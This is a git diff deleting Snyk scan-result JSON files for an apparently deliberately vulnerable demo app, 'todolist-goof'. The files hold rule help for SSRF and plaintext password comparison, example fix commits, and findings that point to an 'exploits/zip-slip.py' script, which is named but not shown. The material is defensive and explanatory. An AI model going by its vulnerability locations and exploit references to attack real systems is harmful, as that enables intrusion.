- "lineChange": "none" - }, - { - "line": "/**\n", - "lineNumber": 8, - "lineChange": "none" - }, - { - "line": " * @author Shota Oda 2016/11/23.\n", - "lineNumber": 9, - "lineChange": "none" - }, - { - "line": " */\n", - "lineNumber": 10, - "lineChange": "none" - }, - { - "line": "@Data\n", - "lineNumber": 11, - "lineChange": "none" - }, - { - "line": "@AllArgsConstructor\n", - "lineNumber": 12, - "lineChange": "none" - }, - { - "line": "public class BusinessAuthIdentity implements AuthIdentity{\n", - "lineNumber": 13, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 14, - "lineChange": "none" - }, - { - "line": "\tprivate Lecturer user;\n", - "lineNumber": 15, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 16, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 17, - "lineChange": "none" - }, - { - "line": "\tpublic String username() {\n", - "lineNumber": 18, - "lineChange": "none" - }, - { - "line": "\t\treturn user.getUsername();\n", - "lineNumber": 19, - "lineChange": "none" - }, - { - "line": "\t}\n", - "lineNumber": 20, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 21, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 22, - "lineChange": "none" - }, - { - "line": "\tpublic String cryptPassword() {\n", - "lineNumber": 23, - "lineChange": "none" - }, - { - "line": "\t\treturn user.getPassword();\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": "\t}\n", - "lineNumber": 25, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 26, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 27, - "lineChange": "none" - }, - { - "line": "\tpublic boolean confirm(String plainPassword) {\n", - "lineNumber": 28, - "lineChange": "none" - }, - { - "line": "\t\treturn cryptPassword().equals(plainPassword);\n", - "lineNumber": 28, - "lineChange": "removed" - }, - { - "line": " return BCrypt.checkpw(plainPassword, cryptPassword());\n", - "lineNumber": 29, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-52010d754aef2fbde5a21bb6e6002096c329060b69306e842cd24a31129752b1L-1", - "lines": [ - { - "line": "import org.mindrot.jbcrypt.BCrypt;\n", - "lineNumber": 6, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 7, - "lineChange": "none" - }, - { - "line": "/**\n", - "lineNumber": 8, - "lineChange": "none" - }, - { - "line": " * @author Shota Oda 2016/11/23.\n", - "lineNumber": 9, - "lineChange": "none" - }, - { - "line": " */\n", - "lineNumber": 10, - "lineChange": "none" - }, - { - "line": "@Data\n", - "lineNumber": 11, - "lineChange": "none" - }, - { - "line": "@AllArgsConstructor\n", - "lineNumber": 12, - "lineChange": "none" - }, - { - "line": "public class ConsumerAuthIdentity implements AuthIdentity{\n", - "lineNumber": 13, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 14, - "lineChange": "none" - }, - { - "line": "\tprivate Student student;\n", - "lineNumber": 15, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 16, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 17, - "lineChange": "none" - }, - { - "line": "\tpublic String username() {\n", - "lineNumber": 18, - "lineChange": "none" - }, - { - "line": "\t\treturn student.getUsername();\n", - "lineNumber": 19, - "lineChange": "none" - }, - { - "line": "\t}\n", - "lineNumber": 20, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 21, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 22, - "lineChange": "none" - }, - { - "line": "\tpublic String cryptPassword() {\n", - "lineNumber": 23, - "lineChange": "none" - }, - { - "line": "\t\treturn student.getPassword();\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": "\t}\n", - "lineNumber": 25, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 26, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 27, - "lineChange": "none" - }, - { - "line": "\tpublic boolean confirm(String plainPassword) {\n", - "lineNumber": 28, - "lineChange": "none" - }, - { - "line": "\t\treturn cryptPassword().equals(plainPassword);\n", - "lineNumber": 28, - "lineChange": "removed" - }, - { - "line": "\t\treturn BCrypt.checkpw(plainPassword, cryptPassword());\n", - "lineNumber": 29, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/SeraphJACK/SimpleLogin/commit/ff6715f90b9a3e00f7201618ff2f4986c5ebc0f5?diff=split#diff-c79ff75898e7300d5901fce735e57a03db459d401284e7c67ec4711d5adebba4L-1", - "lines": [ - { - "line": "import org.mindrot.jbcrypt.BCrypt;\n", - "lineNumber": 4, - "lineChange": "added" - }, - { - "line": "import top.seraphjack.simplelogin.SLConfig;\n", - "lineNumber": 5, - "lineChange": "none" - }, - { - "line": "import top.seraphjack.simplelogin.SimpleLogin;\n", - "lineNumber": 6, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 7, - "lineChange": "none" - }, - { - "line": "import javax.annotation.concurrent.NotThreadSafe;\n", - "lineNumber": 8, - "lineChange": "none" - }, - { - "line": "import java.io.IOException;\n", - "lineNumber": 9, - "lineChange": "none" - }, - { - "line": "import java.nio.charset.StandardCharsets;\n", - "lineNumber": 10, - "lineChange": "none" - }, - { - "line": "import java.nio.file.Files;\n", - "lineNumber": 11, - "lineChange": "none" - }, - { - "line": "import java.nio.file.Path;\n", - "lineNumber": 12, - "lineChange": "none" - }, - { - "line": "import java.nio.file.StandardOpenOption;\n", - "lineNumber": 13, - "lineChange": "none" - }, - { - "line": "import java.util.Arrays;\n", - "lineNumber": 14, - "lineChange": "none" - }, - { - "line": "import java.util.HashMap;\n", - "lineNumber": 15, - "lineChange": "none" - }, - { - "line": "import java.util.Map;\n", - "lineNumber": 16, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 17, - "lineChange": "none" - }, - { - "line": "@NotThreadSafe\n", - "lineNumber": 18, - "lineChange": "none" - }, - { - "line": "public class StorageProviderFile implements StorageProvider {\n", - "lineNumber": 19, - "lineChange": "none" - }, - { - "line": " private Gson gson;\n", - "lineNumber": 20, - "lineChange": "none" - }, - { - "line": " private Path path;\n", - "lineNumber": 21, - "lineChange": "none" - }, - { - "line": " private Map entries;\n", - "lineNumber": 22, - "lineChange": "none" - }, - { - "line": " private boolean dirty = false;\n", - "lineNumber": 23, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": " StorageProviderFile(Path path) throws IOException {\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": " this.path = path;\n", - "lineNumber": 26, - "lineChange": "none" - }, - { - "line": " this.gson = new Gson();\n", - "lineNumber": 27, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 28, - "lineChange": "none" - }, - { - "line": " if (Files.exists(path)) {\n", - "lineNumber": 29, - "lineChange": "none" - }, - { - "line": " entries = new HashMap<>();\n", - "lineNumber": 30, - "lineChange": "none" - }, - { - "line": " Arrays.stream(gson.fromJson(new String(Files.readAllBytes(path), StandardCharsets.UTF_8), POJOUserEntry[].class)).forEach(e -> entries.put(e.username, e));\n", - "lineNumber": 31, - "lineChange": "none" - }, - { - "line": " } else {\n", - "lineNumber": 32, - "lineChange": "none" - }, - { - "line": " if (!Files.exists(path.getParent())) {\n", - "lineNumber": 33, - "lineChange": "none" - }, - { - "line": " Files.createDirectories(path.getParent());\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " entries = new HashMap<>();\n", - "lineNumber": 36, - "lineChange": "none" - }, - { - "line": " Files.createFile(path);\n", - "lineNumber": 37, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 38, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 40, - "lineChange": "none" - }, - { - "line": " @Override\n", - "lineNumber": 41, - "lineChange": "none" - }, - { - "line": " public boolean checkPassword(String username, String password) {\n", - "lineNumber": 42, - "lineChange": "none" - }, - { - "line": " if (entries.containsKey(username)) {\n", - "lineNumber": 43, - "lineChange": "none" - }, - { - "line": " return entries.get(username).password.equals(password);\n", - "lineNumber": 43, - "lineChange": "removed" - }, - { - "line": " return BCrypt.checkpw(password, entries.get(username).password);\n", - "lineNumber": 44, - "lineChange": "added" - } - ] - } - ], - "exampleCommitDescriptions": [], - "precision": "very-high", - "repoDatasetSize": 2, - "cwe": [ - "CWE-256" - ] - } - } - ] - } - }, - "results": [ - { - "ruleId": "python/Ssrf", - "ruleIndex": 0, - "level": "warning", - "message": { - "text": "Unsanitized input from a command line argument flows into requests.post, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.", - "markdown": "Unsanitized input from {0} {1} into {2}, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.", - "arguments": [ - "[a command line argument](0)", - "[flows](1),(2),(3),(4),(5),(6)", - "[requests.post](7)" - ] - }, - "locations": [ - { - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 13, - "endLine": 13, - "startColumn": 1, - "endColumn": 14 - } - } - } - ], - "fingerprints": { - "0": "c91d074435910f1a76d8677462395e7a7f5317f554c886317059bf72f98d247f", - "1": "3d071b71.889edeb6.ef7ad415.3456c081.056de048.ba14daf2.081ac3f4.8794408a.a6b41d6e.889edeb6.ef7ad415.edcf1db9.c8b7d5cc.48e1de78.a2237efa.f46ed94e" - }, - "codeFlows": [ - { - "threadFlows": [ - { - "locations": [ - { - "location": { - "id": 0, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 8, - "endColumn": 16 - } - } - } - }, - { - "location": { - "id": 1, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 8, - "endColumn": 16 - } - } - } - }, - { - "location": { - "id": 2, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 8, - "endColumn": 19 - } - } - } - }, - { - "location": { - "id": 3, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 8, - "endColumn": 69 - } - } - } - }, - { - "location": { - "id": 4, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 7, - "endColumn": 97 - } - } - } - }, - { - "location": { - "id": 5, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 1, - "endColumn": 97 - } - } - } - }, - { - "location": { - "id": 6, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 13, - "endLine": 13, - "startColumn": 15, - "endColumn": 18 - } - } - } - }, - { - "location": { - "id": 7, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 13, - "endLine": 13, - "startColumn": 1, - "endColumn": 14 - } - } - } - } - ] - } - ] - } - ], - "properties": { - "priorityScore": 534, - "priorityScoreFactors": [ - { - "label": true, - "type": "hotFileCodeFlow" - }, - { - "label": true, - "type": "fixExamples" - } - ], - "isAutofixable": false - } - }, - { - "ruleId": "java/ReturnsPassword", - "ruleIndex": 1, - "level": "warning", - "message": { - "text": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", - "markdown": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", - "arguments": [] - }, - "locations": [ - { - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 250, - "endLine": 250, - "startColumn": 17, - "endColumn": 50 - } - } - } - ], - "fingerprints": { - "0": "321c85af98d01d74e11fa5dbd45f05d79b2a8850b63a02c1da64df28bfa00cdc", - "1": "ec2603c1.d33f1a8f.d308627b.9998adc9.dd06b926.349570c1.6ae0062a.02370d47.ec2603c1.d33f1a8f.fc7d5400.9998adc9.dd06b926.349570c1.6ae0062a.02370d47" - }, - "codeFlows": [ - { - "threadFlows": [ - { - "locations": [ - { - "location": { - "id": 0, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 250, - "endLine": 250, - "startColumn": 17, - "endColumn": 50 - } - } - } - } - ] - } - ] - } - ], - "properties": { - "priorityScore": 617, - "priorityScoreFactors": [ - { - "label": true, - "type": "multipleOccurrence" - }, - { - "label": true, - "type": "hotFileSource" - }, - { - "label": true, - "type": "fixExamples" - } - ], - "isAutofixable": false - } - }, - { - "ruleId": "java/ReturnsPassword", - "ruleIndex": 1, - "level": "warning", - "message": { - "text": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", - "markdown": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", - "arguments": [] - }, - "locations": [ - { - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 254, - "endLine": 254, - "startColumn": 17, - "endColumn": 54 - } - } - } - ], - "fingerprints": { - "0": "5a6e18b33f52d656e45141c69fb41d4f9763dad06f518bac9d79f375ee50b600", - "1": "daf8aa0f.ebc140b8.d308627b.9998adc9.dd06b926.31ccdec6.d2f0a140.02370d47.daf8aa0f.ebc140b8.fc7d5400.9998adc9.dd06b926.31ccdec6.d2f0a140.02370d47" - }, - "codeFlows": [ - { - "threadFlows": [ - { - "locations": [ - { - "location": { - "id": 0, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 254, - "endLine": 254, - "startColumn": 17, - "endColumn": 54 - } - } - } - } - ] - } - ] - } - ], - "properties": { - "priorityScore": 617, - "priorityScoreFactors": [ - { - "label": true, - "type": "multipleOccurrence" - }, - { - "label": true, - "type": "hotFileSource" - }, - { - "label": true, - "type": "fixExamples" - } - ], - "isAutofixable": false - } - } - ], - "properties": { - "coverage": [ - { - "isSupported": true, - "lang": "HTML", - "files": 10, - "type": "SUPPORTED" - }, - { - "isSupported": true, - "lang": "Java", - "files": 36, - "type": "SUPPORTED" - }, - { - "isSupported": true, - "lang": "XML", - "files": 14, - "type": "SUPPORTED" - }, - { - "isSupported": true, - "lang": "Python", - "files": 2, - "type": "SUPPORTED" - }, - { - "isSupported": true, - "lang": "JavaScript", - "files": 6, - "type": "SUPPORTED" - }, - { - "isSupported": true, - "lang": "Java Server Pages", - "files": 12, - "type": "SUPPORTED" - } - ] - } - } - ] -} diff --git a/test.json b/test.json deleted file mode 100644 index 34a147d0cb..0000000000 --- a/test.json +++ /dev/null @@ -1,511 +0,0 @@ -{ - "id": "python/Ssrf", - "name": "Ssrf", - "shortDescription": { - "text": "Server-Side Request Forgery (SSRF)" - }, - "defaultConfiguration": { - "level": "warning" - }, - "help": { - "markdown": "\n## Details\nIn a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.\n\n## Best practices for prevention\n* Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.\n* Use authentication even within your own network to prevent exploitation of server-side requests.\n* Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.\n* Ideally, avoid sending server requests based on user-provided data altogether.\n* Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.\n* Disable suspect and exploitable URL schemas. Common culprits include obscure and little-used schemas such as `file://`, `dict://`, `ftp://`, and `gopher://`.", - "text": "" - }, - "properties": { - "tags": [ - "python", - "Ssrf", - "Security", - "SourceNonServer", - "SourceLocalEnv", - "SourceCLI", - "Taint" - ], - "categories": [ - "Security" - ], - "exampleCommitFixes": [ - { - "commitURL": "https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/commit/23ad832af741f0354949a72e6c6f799eb9d2bace?diff=split#diff-7efee2ee97af01f846ed5818e84c955c51bd8efe06588e0dfa341c68966d945fL-1", - "lines": [ - { - "line": " parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"Downloads and unpacks assets\")\n", - "lineNumber": 31, - "lineChange": "removed" - }, - { - "line": " parser.add_argument(\"zip_url\", action=\"store\", type=str, help=\"URL of the assets package\")\n", - "lineNumber": 32, - "lineChange": "removed" - }, - { - "line": " args = parser.parse_args()\n", - "lineNumber": 33, - "lineChange": "removed" - }, - { - "line": " url = \"https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/releases/download/v1.1.2/scenes.zip\"\n", - "lineNumber": 31, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " request = requests.get(args.zip_url, stream=True)\n", - "lineNumber": 36, - "lineChange": "removed" - }, - { - "line": " request = requests.get(url, stream=True)\n", - "lineNumber": 34, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/yask123/Instant-Movie-Streamer/commit/0b66df24286da3df144b8874cb40db4c6ddf5c6c?diff=split#diff-92c6c2b7103c0f894cf5a1c09b289b8251c1c260eb20cb9027189a2a0eee5d99L-1", - "lines": [ - { - "line": "def get_magnet_link(movie_name = 'harry potter'):\n", - "lineNumber": 32, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 33, - "lineChange": "added" - }, - { - "line": " URL = 'https://www.skytorrents.in/search/all/ed/1/?q='+movie_name.replace(' ', '+')\n", - "lineNumber": 34, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": "def get_torrent_url(search_url):\n", - "lineNumber": 40, - "lineChange": "removed" - }, - { - "line": " \"\"\"Grabs the best matched torrent URL from the search results.\"\"\"\n", - "lineNumber": 41, - "lineChange": "removed" - }, - { - "line": " search_request_response = requests.get(search_url, verify=False)\n", - "lineNumber": 42, - "lineChange": "removed" - }, - { - "line": " soup = BeautifulSoup(search_request_response.text, 'html.parser')\n", - "lineNumber": 43, - "lineChange": "removed" - }, - { - "line": " movie_page = 'https://kat.cr' + (soup.find_all(\"a\", class_=\"cellMainLink\")[0].get('href'))\n", - "lineNumber": 44, - "lineChange": "removed" - }, - { - "line": " resp = requests.get(URL)\n", - "lineNumber": 36, - "lineChange": "added" - }, - { - "line": " soup = BeautifulSoup(resp.text, 'html.parser')\n", - "lineNumber": 37, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/hacktoolkit/django-htk/commit/01df728743a36721d7659247a3e3b9907133ffee?diff=split#diff-eec36e337287f60f4a26ec5ed80b77d0234217d0de7dab8846fe3a39048cef9fL-1", - "lines": [ - { - "line": "GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", - "lineNumber": 23, - "lineChange": "removed" - }, - { - "line": "GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", - "lineNumber": 24, - "lineChange": "removed" - }, - { - "line": "GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", - "lineNumber": 25, - "lineChange": "removed" - }, - { - "line": "from htk.utils import htk_setting\n", - "lineNumber": 23, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 24, - "lineChange": "added" - }, - { - "line": "GOOGLE_GEOCODING_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'\n", - "lineNumber": 25, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", - "lineNumber": 26, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", - "lineNumber": 27, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", - "lineNumber": 28, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 29, - "lineChange": "none" - }, - { - "line": "class Usage(Exception):\n", - "lineNumber": 30, - "lineChange": "none" - }, - { - "line": " def __init__(self, msg):\n", - "lineNumber": 31, - "lineChange": "none" - }, - { - "line": " self.msg = msg\n", - "lineNumber": 32, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 33, - "lineChange": "none" - }, - { - "line": "def main(argv = None):\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " OPT_STR = 'hgr'\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " OPT_LIST = [\n", - "lineNumber": 36, - "lineChange": "none" - }, - { - "line": " 'help',\n", - "lineNumber": 37, - "lineChange": "none" - }, - { - "line": " 'geocode',\n", - "lineNumber": 38, - "lineChange": "none" - }, - { - "line": " 'resolve',\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": " ]\n", - "lineNumber": 40, - "lineChange": "none" - }, - { - "line": " is_geocode = True\n", - "lineNumber": 41, - "lineChange": "none" - }, - { - "line": " if argv is None:\n", - "lineNumber": 42, - "lineChange": "none" - }, - { - "line": " argv = sys.argv\n", - "lineNumber": 43, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 44, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 45, - "lineChange": "none" - }, - { - "line": " progname = argv[0]\n", - "lineNumber": 46, - "lineChange": "none" - }, - { - "line": " opts, args = getopt.getopt(argv[1:],\n", - "lineNumber": 47, - "lineChange": "none" - }, - { - "line": " OPT_STR,\n", - "lineNumber": 48, - "lineChange": "none" - }, - { - "line": " OPT_LIST)\n", - "lineNumber": 49, - "lineChange": "none" - }, - { - "line": " except getopt.error, msg:\n", - "lineNumber": 50, - "lineChange": "none" - }, - { - "line": " raise Usage(msg)\n", - "lineNumber": 51, - "lineChange": "none" - }, - { - "line": " # process options\n", - "lineNumber": 52, - "lineChange": "none" - }, - { - "line": " for o, a in opts:\n", - "lineNumber": 53, - "lineChange": "none" - }, - { - "line": " if o in ('-h', '--help'):\n", - "lineNumber": 54, - "lineChange": "none" - }, - { - "line": " print __doc__\n", - "lineNumber": 55, - "lineChange": "none" - }, - { - "line": " sys.exit(0)\n", - "lineNumber": 56, - "lineChange": "none" - }, - { - "line": " elif o in ('-g', '--geocode'):\n", - "lineNumber": 57, - "lineChange": "none" - }, - { - "line": " is_geocode = True\n", - "lineNumber": 58, - "lineChange": "none" - }, - { - "line": " elif o in ('-r', '--resolve'):\n", - "lineNumber": 59, - "lineChange": "none" - }, - { - "line": " is_geocode = False\n", - "lineNumber": 60, - "lineChange": "none" - }, - { - "line": " if is_geocode and len(args) == 1:\n", - "lineNumber": 61, - "lineChange": "none" - }, - { - "line": " address = args[0]\n", - "lineNumber": 62, - "lineChange": "none" - }, - { - "line": " latitude, longitude = get_latlng(address)\n", - "lineNumber": 63, - "lineChange": "none" - }, - { - "line": " print '%s,%s' % (latitude, longitude,)\n", - "lineNumber": 64, - "lineChange": "none" - }, - { - "line": " elif not is_geocode and len(args) == 2:\n", - "lineNumber": 65, - "lineChange": "none" - }, - { - "line": " latitude = args[0]\n", - "lineNumber": 66, - "lineChange": "none" - }, - { - "line": " longitude = args[1]\n", - "lineNumber": 67, - "lineChange": "none" - }, - { - "line": " address = reverse_geocode(latitude, longitude)\n", - "lineNumber": 68, - "lineChange": "none" - }, - { - "line": " print address\n", - "lineNumber": 69, - "lineChange": "none" - }, - { - "line": " else:\n", - "lineNumber": 70, - "lineChange": "none" - }, - { - "line": " raise Usage('Incorrect arguments')\n", - "lineNumber": 71, - "lineChange": "none" - }, - { - "line": " \n", - "lineNumber": 72, - "lineChange": "none" - }, - { - "line": " except Usage, err:\n", - "lineNumber": 73, - "lineChange": "none" - }, - { - "line": " print >> sys.stderr, err.msg\n", - "lineNumber": 74, - "lineChange": "none" - }, - { - "line": " print >> sys.stderr, \"for help use --help\"\n", - "lineNumber": 75, - "lineChange": "none" - }, - { - "line": " return 3.14159\n", - "lineNumber": 76, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 77, - "lineChange": "none" - }, - { - "line": "def get_latlng(address):\n", - "lineNumber": 78, - "lineChange": "none" - }, - { - "line": " address_query = urllib.quote(address, '')\n", - "lineNumber": 76, - "lineChange": "none" - }, - { - "line": " \n", - "lineNumber": 77, - "lineChange": "none" - }, - { - "line": " values = {\n", - "lineNumber": 78, - "lineChange": "none" - }, - { - "line": " 'format' : 'json',\n", - "lineNumber": 79, - "lineChange": "none" - }, - { - "line": "'sensor' : 'false',\n", - "lineNumber": 80, - "lineChange": "none" - }, - { - "line": "'address' : address_query,\n", - "lineNumber": 81, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 82, - "lineChange": "none" - }, - { - "line": " url = GOOGLE_GEOCODING_API_GEOCODE_URL % values\n", - "lineNumber": 83, - "lineChange": "removed" - }, - { - "line": " response = requests.get(url)\n", - "lineNumber": 84, - "lineChange": "removed" - }, - { - "line": " key = htk_setting('HTK_GOOGLE_GEOCODING_API_KEY', None)\n", - "lineNumber": 83, - "lineChange": "added" - }, - { - "line": " if key:\n", - "lineNumber": 84, - "lineChange": "added" - }, - { - "line": " params['key'] = key\n", - "lineNumber": 85, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 86, - "lineChange": "added" - }, - { - "line": " response = requests.get(GOOGLE_GEOCODING_API_URL, params=params)\n", - "lineNumber": 87, - "lineChange": "added" - } - ] - } - ], - "exampleCommitDescriptions": [], - "precision": "very-high", - "repoDatasetSize": 4, - "cwe": [ - "CWE-918" - ] - } -} diff --git a/test2.json b/test2.json deleted file mode 100644 index 1652bc2a7d..0000000000 --- a/test2.json +++ /dev/null @@ -1,108 +0,0 @@ -{ - "vulnerabilities": [], - "ok": true, - "dependencyCount": 0, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\nexclude:\n global:\n - todolist-goof/exploits/zip-slip.py\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "projectId": 